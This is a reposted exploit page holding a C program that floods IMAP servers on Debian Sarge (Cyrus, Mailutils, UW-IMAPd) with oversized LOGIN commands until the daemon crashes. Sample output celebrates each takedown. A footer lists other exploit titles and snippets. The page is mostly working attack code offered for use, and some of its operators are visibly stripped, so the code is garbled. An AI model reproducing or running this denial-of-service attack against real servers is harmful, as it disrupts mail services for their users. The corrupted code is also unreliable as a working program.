Debian Sarge Multiple IMAP Server Denial of Service Exploit

所属分类: 网络安全 / Exploit 阅读数: 131
收藏 0 赞 0 分享
/*

Debian Sarge Multiple IMAP Server DoS (debianimapers.c)
Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]

Testing Cyrus IMAPd:

bash$ ./debianimapers 192.168.0.189

.....

39 tries and imapd goes down! Mission Complete!

Testing Mailutil's IMAP4d:

bash$ ./debianimapers 192.168.0.189

.....

38 tries and imapd goes down! Mission Complete!

Testing UW-IMAPd:

bash$ ./debianimapers 192.168.0.189

.....

39 tries and imapd goes down! Mission Complete!

bash$

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define COUNT 100
#define SIZE 100000

char imaplogin[] = "A0001 LOGIN";

int main(int argc, char *argv[])
{

char buffer[SIZE], imapped[SIZE 30];
int i, port = 143;

memset(buffer, 0x41, sizeof(buffer));
memset(imapped, 0, sizeof(imapped));

snprintf(imapped, sizeof(imapped)-1, "%s %s %s\r\n\r\n", imaplogin, buffer, buffer);

if(argc < 2)
{

printf("\nDebian Sarge Multiple IMAP Server DoS");
printf("\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]\n");

printf("\nUsage %s <host>\n\n", argv[0]);

return 0;
}

printf("\nDebian Sarge Multiple IMAP Server DoS");
printf("\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]\n");

int sock;
struct sockaddr_in remote;

remote.sin_family = AF_INET;
remote.sin_port = htons(port);
remote.sin_addr.s_addr = inet_addr(argv[1]);

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Error: socket()\n"); return -1; }
if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { printf("Error: connect(%s:%d)\n", argv[1], port); return -1; }

close(sock);

printf("\nUsually takes ~1-2 minutes, LAN/Internet and connection speed will make time vary...\n");

for(i = 0; i <= COUNT; i )
{

struct sockaddr_in remote;
remote.sin_family = AF_INET;
remote.sin_port = htons(port);
remote.sin_addr.s_addr = inet_addr(argv[1]);

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Error: socket()\n"); return -1; }

sleep(1);

if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { printf("\n%d tries and imapd goes down! Mission Complete!\n\n", i); return -1; }

int len = sizeof(imapped);
send(sock, imapped, len, 0);
close(sock);

}

return 0;
}

更多精彩内容其他人还在看

OllyDBG v1.10 and ImpREC v1.7f (export name) BOF PoC

;-------------------------------------------------------------------------; ; OllyDBG v1.10 and ImpREC v1.7f export name buffer overflow
收藏 0 赞 0 分享

Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day

#!/usr/bin/python # Download Accelerator Plus - DAP 8.x (m3u) 0day Local Buffer Overflow Exploit # Bug discovered by Krystian Kloskows
收藏 0 赞 0 分享

Dreampics Builder (page) Remote SQL Injection Vulnerability

######################################################### # # PICS BUILDER (page) SQL Injection Vulnerability #================
收藏 0 赞 0 分享

BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

# Name Of Script : Ray # Version : 3.5 # Download From : http://get.boonex.com/Ray-v.3.5-Suite-Free # Found By : RoMaNc
收藏 0 赞 0 分享

AuraCMS

#!/usr/bin/perl # k1tk4t Public Security Advisory # //////////////////////////////////////////////////////////// # AuraCMS <= 2.
收藏 0 赞 0 分享

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

------------------------------------------------------------------------------------------- Joom
收藏 0 赞 0 分享

Mole Group Last Minute Script

-[*] ================================================================================ [*]- -[*] Last Minute Script <= 4.0 Remo
收藏 0 赞 0 分享

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

#!/usr/bin/perl #================================================= # BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit #================
收藏 0 赞 0 分享

Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

# Name Of Script : Dolphin PHP # Version : 6.1.2 # Download From : http://heanet.dl.sourceforge.net/sourceforge/boonex-dolphin/Dol
收藏 0 赞 0 分享

trixbox (langChoice) Local File Inclusion Exploit (connect-back)

#!/usr/bin/perl -w # Jean-Michel BESNARD - LEXSI Audit # 2008-07-08 # perl trixbox_fi.pl 192.168.1.212 # Please listen careful
收藏 0 赞 0 分享
查看更多